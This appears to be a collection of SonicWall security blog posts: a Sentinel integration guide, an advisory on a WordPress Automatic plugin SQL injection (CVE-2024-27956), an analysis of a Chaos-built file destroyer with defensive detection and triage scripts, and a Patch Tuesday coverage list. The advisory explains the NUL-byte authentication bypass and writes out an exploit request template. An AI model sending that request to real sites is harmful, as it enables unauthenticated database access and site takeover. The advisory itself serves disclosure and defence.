Microsoft Sentinel is a scalable, cloud-native SIEM and Security Orchestration, Automation and Response (SOAR) solution. It lets you uncover sophisticated threats and respond decisively with an intelligent, comprehensive SIEM built for proactive threat detection and hunting, threat investigation and response. Microsoft Sentinel also provides a consolidated way to acquire content like data connectors, workbooks, analytics and automations.

SonicWall Firewalls
SonicWall NGFWs provide the security, control and visibility to maintain an effective cybersecurity posture. SonicWall firewalls are designed to meet your specific security and usability needs, all at a cost that will protect your budget while securing your network infrastructure.

Features like stateful high availability and power supply redundancy deliver ‘always-on’ continuity, while superior UX and simpler, single-pane-of-glass management ease complexity. And with SD-WAN and DPI-SSL included, they offer an industry-leading TCO.

Features and Functionality

The integration of SonicWall NGFWs with Microsoft Sentinel can help organizations achieve a higher level of holistic visibility, security, real-time threat detection and response automation for their security infrastructure. These integration capabilities will enable our partners and customers to forward the firewall logs to the Microsoft Sentinel cloud platform, parse the logs, create custom workflows and automate the responses.

Configuration Steps

Integration can be configured in these simple steps:

1. Deploying a Microsoft Sentinel Workspace

  • Create a new resource using a custom template that builds the resources needed for Microsoft Sentinel.

2. Installing the SonicWall Solution for Microsoft Sentinel

  • Install the pre-defined “SonicWall Network Security” solution from the Microsoft Sentinel Content hub.
  • Configure the Common Event Format (CEF) via AMA data connector’s data collection rule to set the event filter types (Syslog facilities) to collect.
  • Configure the collection rules:
    • LOG_LOCAL* (0-7) to LOG_DEBUG
    • LOG_SYSLOG to LOG_DEBUG
    • LOG_USER to LOG_DEBUG

3. Installing the Operations Management Suite (OMS) or Log Analytics Agent

  • The OMS/Log Analytics Agent provides a Syslog relay. This agent should be installed on a host within the network, and SonicOS should be configured to send ArcSight-formatted Syslog data to the agent. The agent establishes a secure connection with Azure, so the log data is not sent to the cloud in plaintext.

4. Configuring a Syslog Server on a SonicWall Firewall

  • Configure a syslog server on your SonicWall NGFW and select Syslog Format as ArcSight (CEF) from the dropdown.
  • Specify the IP address/name of your Linux VM as the Syslog server, and Syslog Facility should be Local use 4.
    Note: Refer to this Knowledge Base Article for more information.
  • Validate that the OMS/Log Analytics Agent is receiving CEF messages and can connect to Azure.

5. Microsoft Sentinel Workbooks for SonicWall Firewalls

  • The “SonicWall Network Security” data connector includes workbooks containing a variety of queries for our various security services, as well as other traffic and security insights. You can configure the analytics rule, hunting query and workbooks as per your requirements.

Benefits of Integration

The integration of Microsoft Sentinel and SonicWall NGFWs offers several benefits for enhancing your organization’s security posture.

  • Holistic View: Microsoft Sentinel provides a bird’s-eye view across your infrastructure, reducing the burden of handling sophisticated attacks and large alert volumes.
  • Real-time Threat Detection: By ingesting SonicWall logs, you enhance your threat detection capabilities and gain visibility into network traffic, user behavior and potential security incidents.
  • Threat Visibility and Proactive Hunting: Microsoft Sentinel provides intelligent security analytics, threat intelligence and proactive hunting capabilities, allowing you to detect threats across your environment and respond promptly.
  • Automated Response: Combine Microsoft Sentinel’s SOAR capabilities with SonicWall’s real-time data to automate incident response. You can create or reuse playbooks that execute predefined actions when specific events occur.

Availability

The SonicWall Firewalls and Microsoft Sentinel cloud platform integration is now available to all of our partners/customers.

For more detailed instructions, please refer to the SonicWall Firewall-Sentinel Integration Guide. Here is the data connector instructions article.

Better Together

Integrating the Microsoft Sentinel cloud platform with SonicWall Firewalls is a strategic move for organizations seeking comprehensive security. By leveraging the power of both platforms, you can proactively defend against threats, streamline incident responses, and stay ahead in the ever-evolving cybersecurity landscape.

Remember, security is a continuous journey, and this integration is a significant step toward a safer digital environment. Happy securing! 🔒🌐

We appreciate your continuous support, and please don’t hesitate to contact us if you have any queries or require more information. 😊

WordPress Unauthenticated Arbitrary SQL Execution Vulnerability

Overview

The SonicWall Capture Labs threat research team became aware of a noteworthy vulnerability, an SQL injection in the WordPress Automatic plugin by ValvePress, assessed its impact and developed mitigation measures for it. Around 38,000 sites have this premium plugin installed. The issue allows trivial SQL injection against the plugin’s user authentication check, which can lead to WordPress site takeover. The vulnerability is tracked as CVE-2024-27956 and was assigned a critical CVSSv3 score of 9.9. Given the sizeable user base, low attack complexity and publicly available exploit code (a single crafted SQL query is enough), WordPress users are strongly encouraged to upgrade the plugin to version 3.92.1 or later with utmost priority.

Technical Overview

This vulnerability allows threat actors to circumvent the authentication mechanism by sending a crafted SQL query to the web server.

The WordPress Automatic plugin, developed by Valvepress, is popularly known for automatically posting content from any website. It can import content from popular sites like YouTube, Flickr, Vimeo, Twitter and other social media platforms utilizing the APIs from almost any website. It can also generate content using OpenAI’s ChatGPT.

CVE-2024-27956 stems from improper neutralization of special elements used in an SQL command (SQL injection). It allows unauthenticated actors to bypass the normal authentication check and execute arbitrary SQL through the site’s database connection, which is enough to create admin-level user accounts, upload malicious files and take full control of affected sites. The Hacker News reported more than 5.5 million exploitation attempts; in these campaigns attackers renamed the vulnerable file “inc/csv.php” and other sensitive files to keep the site owner, and rival attackers, from regaining control of the hijacked site. Once a WordPress site is under their control, attackers ensure long-term access by creating backdoors and modifying code.

Triggering the Vulnerability

The flaw exists in “inc/csv.php”, which generally resides under the plugin installation directory. A typical path to the vulnerable file is “/wp‑content/plugins/wp‑automatic/inc/csv.php”. It is also shown in our PoC demonstration in Figure 2.

An unauthenticated request can supply an arbitrary SQL query in the $q variable, as shown in Figure 1. That variable is executed on line 32 of Figure 1 by $wpdb->get_results($q).

Figure 1: inc/csv.php

Prior to execution, there are basic authentication and integrity checks.

  • The first check involves $current_user->user_pass. This value is an empty string when an unauthenticated user accesses the file.
  • The second check compares $integ against the MD5 of the supplied SQL query combined with $current_user->user_pass; since that password hash is an empty string for an unauthenticated user, the attacker only needs to supply the MD5 of the query itself.
  • Before these two checks there is a guard, if(wp_automatic_trim($auth) == ''), so one cannot simply submit an empty string in $auth.
  • To bypass the guard, an attacker supplies a single NUL byte in $auth (URL-encoded as &auth=%00): the parameter is no longer an empty string, the guard passes, and the crafted query is executed.

An example POST request to trigger the vulnerability would look like:

POST http[:]//target-ip:port/wp-content/plugins/wp-automatic/inc/csv.php

q={{query}}&auth=%00&integ={{md5query}}

Here {{query}} is the SQL statement and {{md5query}} its MD5 digest; the auth parameter carries only the NUL byte, as shown in Figure 2.

Exploiting the Vulnerability

To exploit the issue, a WordPress site running a vulnerable version of ValvePress’ WordPress Automatic plugin (earlier than 3.92.1) is needed. An attacker only needs network access to the instance, whether over the internet or a local network. A working PoC with a crafted SQL query is publicly available.

A demonstration of exploitation based on the publicly available PoC can be seen in Figure 2 (below).

Figure 2: CVE-2024-27956 Exploitation
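The request pattern above is distinctive enough to hunt for in web server or reverse-proxy logs even where the IPS signature is not deployed. The following Python script is an added example, not the plugin’s code and not SonicWall’s signature logic: it classifies POST requests to inc/csv.php by the three indicators the write-up describes (SQL text in q, a NUL or whitespace-only auth, and an integ that equals the MD5 of q alone). The request records are constructed for illustration, and the integrity value is modelled as md5(q + user_pass), which collapses to md5(q) for an unauthenticated request as described above; the concatenation order is an assumption.

```python
"""Flag HTTP requests matching the CVE-2024-27956 exploitation pattern.

Added example for this write-up; neither the plugin's code nor the SonicWall
IPS signature. Request records are constructed. Assumption: the plugin's
integrity value is md5(q . user_pass), which is md5(q) when no user is
authenticated.
"""
import hashlib
from urllib.parse import parse_qs, urlsplit

VULN_PATH_SUFFIX = "/wp-content/plugins/wp-automatic/inc/csv.php"


def integ_for(query: str, user_pass: str = "") -> str:
    """Integrity value an exploit must supply (assumed md5(q . user_pass))."""
    return hashlib.md5((query + user_pass).encode("utf-8")).hexdigest()


def classify_request(method: str, target: str, body: str) -> list:
    """Return indicator strings for one request; an empty list means clean."""
    findings = []
    if method.upper() != "POST":
        return findings
    if not urlsplit(target).path.endswith(VULN_PATH_SUFFIX):
        return findings
    params = parse_qs(body, keep_blank_values=True)  # keeps %00 as "\x00"
    q = params.get("q", [""])[0]
    auth = params.get("auth", [""])[0]
    integ = params.get("integ", [""])[0]
    if not q:
        return findings
    findings.append("SQL text posted to wp-automatic inc/csv.php")
    if "\x00" in auth:
        findings.append("auth contains a NUL byte (empty-string guard bypass)")
    elif auth and auth.strip() == "":
        findings.append("auth is whitespace only")
    if integ.lower() == integ_for(q):
        findings.append("integ == md5(q): integrity value computed with no user password")
    return findings


def scan(records):
    """Return (index, findings) for every record that raises at least one indicator."""
    hits = []
    for i, (method, target, body) in enumerate(records):
        found = classify_request(method, target, body)
        if found:
            hits.append((i, found))
    return hits


# Constructed sample traffic: an exploit-shaped request, a request with a
# real-looking auth value and a non-matching integ, and unrelated traffic.
EXPLOIT_QUERY = "SELECT 1"
SAMPLE_RECORDS = [
    ("POST", "/wp-content/plugins/wp-automatic/inc/csv.php",
     f"q=SELECT+1&auth=%00&integ={integ_for(EXPLOIT_QUERY)}"),
    ("POST", "/wp-content/plugins/wp-automatic/inc/csv.php",
     "q=SELECT+1&auth=%24P%24Bexample&integ=0000"),
    ("GET", "/wp-login.php", ""),
]

if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_RECORDS):
        print(idx, SAMPLE_RECORDS[idx][1], findings)
```

Any POST carrying SQL to this file is worth review on its own; the NUL-byte auth and the md5(q) integrity value together are the unauthenticated exploit signature. Most access logs do not record POST bodies, so this check is best run on reverse-proxy or WAF captures that do.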

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

IPS: 19918 – WordPress Automatic Plugin SQL Injection

Remediation Recommendations

Considering the severe consequences of this vulnerability and the ongoing attempts by attackers to exploit it in the wild, users are strongly encouraged to update the WordPress Automatic plugin to version 3.92.1 or later to remove the vulnerability.

Politically Charged Ransomware Weaponized as a File Destroyer

The SonicWall Capture Labs threat research team has been observing a growth of malware built using the Chaos ransomware builder. The sample we have analyzed here is built using this kit, however, it is not intended to work as traditional ransomware, but rather, as a file destroyer. The intent appears to be the destruction of files in response to Italy’s stance on the Israel-Palestine conflict. It purports to be created on behalf of the Italian Socialist Party and is likely aimed at infecting machines within the Italian government’s infrastructure.

Infection Cycle

The malware uses the following icon:

Upon infection, files on the system are encrypted. Each file is given a file extension consisting of four random alphanumeric characters. As this malware is intended to destroy files, the decryption key is probably not stored by the attackers for file retrieval later on in exchange for money. A file named “Leggimi.txt” (“Read me” in Italian) is dropped into directories containing encrypted files. It contains the following message in Italian:

A rough translation of that message is as follows:

- Ransomware route

Italy must be punished for its alliance with the fascist state
By Israel, this malware was scheduled by Marxisti-Leninisti-Maoisti
To spread the anti-medical thought. Of the Palestinians are dying for your actions, I will kill your files. There is no way to recover them.

Palestine Libera
Italy Red Unit and Socialists

The message makes no mention of file decryption for payment and no contact information is presented. Any encrypted files are therefore irretrievable.
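Because no key is retrievable, the useful response work is scoping: finding which directories were hit and how many files were affected. The following Python script is an added example for this write-up, not SonicWall’s detection logic. It walks a tree and reports folders that contain the Leggimi.txt note together with files whose final extension is four random-looking alphanumeric characters. It assumes the random extension is appended after the file’s original extension (for example report.docx.k3x9), and uses an allowlist of ordinary four-character extensions to reduce false positives; both are assumptions, and the sample tree is constructed.

```python
"""Triage scan for the file destroyer described above.

Added example for this write-up, not SonicWall's detection logic. Assumptions:
the four-character random extension is appended after the original extension,
and the BENIGN_EXT allowlist covers common legitimate four-letter extensions.
The sample tree is constructed.
"""
import os
import re
import tempfile

NOTE_NAME = "Leggimi.txt"
RANDOM_EXT = re.compile(r"^[A-Za-z0-9]{4}$")
# Assumption: common legitimate four-character extensions to ignore.
BENIGN_EXT = {"docx", "xlsx", "pptx", "json", "html", "jpeg", "tiff",
              "yaml", "toml", "webp", "heic", "flac", "java", "conf"}


def looks_encrypted(filename: str) -> bool:
    """True if the last suffix is four alphanumerics outside the allowlist and
    the name still carries an earlier extension (e.g. report.docx.k3x9)."""
    parts = filename.split(".")
    if len(parts) < 3:
        return False
    ext = parts[-1]
    return bool(RANDOM_EXT.match(ext)) and ext.lower() not in BENIGN_EXT


def triage(root: str) -> dict:
    """Map each directory holding the ransom note to its suspect-file count."""
    impacted = {}
    for dirpath, _, files in os.walk(root):
        if NOTE_NAME not in files:
            continue
        count = sum(1 for f in files if f != NOTE_NAME and looks_encrypted(f))
        impacted[os.path.relpath(dirpath, root)] = count
    return impacted


def build_sample_tree() -> str:
    """Construct a tree with one impacted directory and one clean one."""
    root = tempfile.mkdtemp(prefix="triage-")
    hit = os.path.join(root, "Documents")
    clean = os.path.join(root, "Pictures")
    os.makedirs(hit)
    os.makedirs(clean)
    for name in ("report.docx.k3x9", "budget.xlsx.Qz17", "notes.txt.p0Lm", NOTE_NAME):
        open(os.path.join(hit, name), "w").close()
    for name in ("holiday.jpeg", "cat.webp"):
        open(os.path.join(clean, name), "w").close()
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    for directory, n in triage(sample_root).items():
        print(f"{directory}: {n} suspect files")
```

Run triage() against a mounted image of the affected volume rather than the live system, and treat the count as a lower bound: a directory whose note was removed, or whose files happened to carry an allowlisted extension, will be missed.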

Reverse engineering the malware reveals a list of targeted file extensions:

We can also see a list of directories that are targeted:

An image file is embedded in the malware executable file. It is base64 encoded:

After decoding the image, it is displayed as the desktop wallpaper:

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Cambiare_Rotta.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Microsoft Security Bulletin Coverage for May 2024

Overview

Microsoft’s May 2024 Patch Tuesday has 59 vulnerabilities, 25 of which are Remote Code Execution vulnerabilities. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of May 2024 and has produced coverage for 9 of the reported vulnerabilities.

Vulnerabilities with Detections

CVE | CVE Title | Signature
CVE-2024-29996 | Windows Common Log File System Driver Elevation of Privilege Vulnerability | ASPY 568 Exploit-exe exe.MP_383
CVE-2024-30025 | Windows Common Log File System Driver Elevation of Privilege Vulnerability | ASPY 569 Exploit-exe exe.MP_384
CVE-2024-30032 | Windows DWM Core Library Elevation of Privilege Vulnerability | ASPY 570 Exploit-exe exe.MP_385
CVE-2024-30034 | Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability | ASPY 571 Exploit-exe exe.MP_386
CVE-2024-30035 | Windows DWM Core Library Elevation of Privilege Vulnerability | ASPY 572 Exploit-exe exe.MP_387
CVE-2024-30037 | Windows Common Log File System Driver Elevation of Privilege Vulnerability | ASPY 567 Exploit-exe exe.MP_382
CVE-2024-30044 | Microsoft SharePoint Server Remote Code Execution Vulnerability | IPS 15674 Microsoft SharePoint Server Remote Code Execution (CVE-2024-30044)
CVE-2024-30050 | Windows Mark of the Web Security Feature Bypass Vulnerability | IPS 15666 Windows Mark of the Web Security Feature Bypass (CVE-2024-30050)
CVE-2024-30051 | Windows DWM Core Library Elevation of Privilege Vulnerability | ASPY 566 Malformed-docx docx.MP_11

Release Breakdown

The vulnerabilities can be classified into the following categories:

For May, there is one Critical, 57 Important and one Moderate vulnerability.

2024 Patch Tuesday Monthly Comparison

Microsoft tracks vulnerabilities that are being actively exploited at the time of discovery and those that have been disclosed publicly before the Patch Tuesday release for each month. The above chart displays these metrics as seen each month.

Release Detailed Breakdown

Denial of Service Vulnerabilities

CVE-2024-30011 - Windows Hyper-V Denial of Service Vulnerability
CVE-2024-30019 - DHCP Server Service Denial of Service Vulnerability
CVE-2024-30046 - ASP.NET Core Denial of Service Vulnerability

Elevation of Privilege Vulnerabilities

CVE-2024-26238 - Microsoft PLUGScheduler Scheduled Task Elevation of Privilege Vulnerability
CVE-2024-29994 - Microsoft Windows SCSI Class System File Elevation of Privilege Vulnerability
CVE-2024-29996 - Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2024-30007 - Microsoft Brokering File System Elevation of Privilege Vulnerability
CVE-2024-30018 - Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-30025 - Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2024-30027 - NTFS Elevation of Privilege Vulnerability
CVE-2024-30028 - Win32k Elevation of Privilege Vulnerability
CVE-2024-30030 - Win32k Elevation of Privilege Vulnerability
CVE-2024-30031 - Windows CNG Key Isolation Service Elevation of Privilege Vulnerability
CVE-2024-30032 - Windows DWM Core Library Elevation of Privilege Vulnerability
CVE-2024-30033 - Windows Search Service Elevation of Privilege Vulnerability
CVE-2024-30035 - Windows DWM Core Library Elevation of Privilege Vulnerability
CVE-2024-30037 - Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2024-30038 - Win32k Elevation of Privilege Vulnerability
CVE-2024-30049 - Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability
CVE-2024-30051 - Windows DWM Core Library Elevation of Privilege Vulnerability

Information Disclosure Vulnerabilities

CVE-2024-30008 - Windows DWM Core Library Information Disclosure Vulnerability
CVE-2024-30016 - Windows Cryptographic Services Information Disclosure Vulnerability
CVE-2024-30034 - Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability
CVE-2024-30036 - Windows Deployment Services Information Disclosure Vulnerability
CVE-2024-30039 - Windows Remote Access Connection Manager Information Disclosure Vulnerability
CVE-2024-30043 - Microsoft SharePoint Server Information Disclosure Vulnerability
CVE-2024-30054 - Microsoft Power BI Client JavaScript SDK Information Disclosure Vulnerability

Remote Code Execution Vulnerabilities

CVE-2024-29997 - Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-29998 - Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-29999 - Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30000 - Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30001 - Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30002 - Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30003 - Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30004 - Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30005 - Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30006 - Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
CVE-2024-30009 - Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30010 - Windows Hyper-V Remote Code Execution Vulnerability
CVE-2024-30012 - Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30014 - Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30015 - Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30017 - Windows Hyper-V Remote Code Execution Vulnerability
CVE-2024-30020 - Windows Cryptographic Services Remote Code Execution Vulnerability
CVE-2024-30021 - Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-30022 - Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30023 - Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30024 - Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30029 - Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-30042 - Microsoft Excel Remote Code Execution Vulnerability
CVE-2024-30044 - Microsoft SharePoint Server Remote Code Execution Vulnerability
CVE-2024-30045 - .NET and Visual Studio Remote Code Execution Vulnerability

Security Feature Bypass Vulnerabilities

CVE-2024-30040 - Windows MSHTML Platform Security Feature Bypass Vulnerability
CVE-2024-30050 - Windows Mark of the Web Security Feature Bypass Vulnerability

Spoofing Vulnerabilities

CVE-2024-30041 - Microsoft Bing Search Spoofing Vulnerability
CVE-2024-30047 - Dynamics 365 Customer Insights Spoofing Vulnerability
CVE-2024-30048 - Dynamics 365 Customer Insights Spoofing Vulnerability
CVE-2024-30053 - Azure Migrate Cross-Site Scripting Vulnerability

Tampering Vulnerabilities

CVE-2024-30059 - Microsoft Intune for Android Mobile Application Management Tampering Vulnerability